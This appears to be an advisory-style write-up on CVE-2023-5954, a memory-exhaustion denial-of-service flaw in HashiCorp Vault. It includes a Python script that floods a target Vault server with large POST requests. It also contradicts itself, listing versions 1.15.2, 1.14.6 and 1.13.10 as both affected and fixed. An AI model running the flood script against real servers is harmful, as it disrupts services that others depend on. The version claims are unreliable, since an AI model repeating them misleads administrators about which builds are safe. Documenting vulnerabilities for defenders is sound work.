CVE-2023-5954: HashiCorp Vault and Vault Enterprise Memory Consumption Vulnerability Fixed in Versions 1.15.2, 1.14.6, and 1.13.10

HashiCorp Vault is a popular open-source tool that allows users to store and manage sensitive data such as passwords, API keys, and tokens securely. Vault Enterprise builds on this by providing advanced features tailored for business-critical environments and large organizations. One of the core components of Vault is its policy system, which ensures that only authorized users and applications can access the stored secrets.

Vulnerability Overview

The CVE-2023-5954 vulnerability lies in HashiCorp Vault's policy checking mechanism when handling inbound client requests, leading to an unbounded consumption of memory. Exploiting this issue can lead to a denial-of-service attack against the Vault server. The CVE-2023-5954 vulnerability affects HashiCorp Vault versions 1.15.2, 1.14.6, and 1.13.10.

Exploit Details

An attacker can exploit this vulnerability by sending a large number of inbound client requests to the Vault server, each containing a specially-crafted payload that triggers the policy check mechanism. Each request consumes an increasing amount of memory, which eventually leads to the Vault server running out of memory and becoming unresponsive or crashing.

For example, the following code snippet could be used as part of a proof-of-concept exploit

import requests

TARGET = "http://vault.example.com";  # Replace with your target Vault server

payload = "SECRET" * 10000  # A payload that consumes a large amount of memory

headers = {
    "Content-Type": "application/json",
}

for i in range(100000):
    response = requests.post(
        f"{TARGET}/v1/secret/data/test/{i}",
        headers=headers,
        json={"data": {"payload": payload}},
    )
    print(f"Request {i} sent")

As more requests are made, the memory consumption on the Vault server will continue to grow, potentially causing it to crash or become unresponsive.

Impact

This vulnerability impacts the availability of the Vault server and can lead to denial-of-service. Affected users may experience disruption of services, and the unresponsive server may result in operational challenges.

Solution

HashiCorp has released new versions of Vault and Vault Enterprise that address the CVE-2023-5954 vulnerability. Users should upgrade to Vault 1.15.2, 1.14.6, or 1.13.10 to protect against the vulnerability.

- Vault 1.15.2: https://releases.hashicorp.com/vault/1.15.2/
- Vault 1.14.6: https://releases.hashicorp.com/vault/1.14.6/
- Vault 1.13.10: https://releases.hashicorp.com/vault/1.13.10/

After installing the updates, it is crucial to restart your Vault server to apply the changes.

Original Advisory References

- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5954
- https://discuss.hashicorp.com/t/vault-and-vault-enterprise-cve-2023-5954/41098

Conclusion

The CVE-2023-5954 vulnerability in HashiCorp Vault's policy checking mechanism allows attackers to trigger a denial-of-service attack by consuming large amounts of memory. Users running affected versions of Vault or Vault Enterprise should upgrade to the latest versions (1.15.2, 1.14.6, or 1.13.10) as soon as possible to mitigate the risk.

Timeline

Published on: 11/09/2023 21:15:25 UTC
Last modified on: 11/16/2023 19:26:56 UTC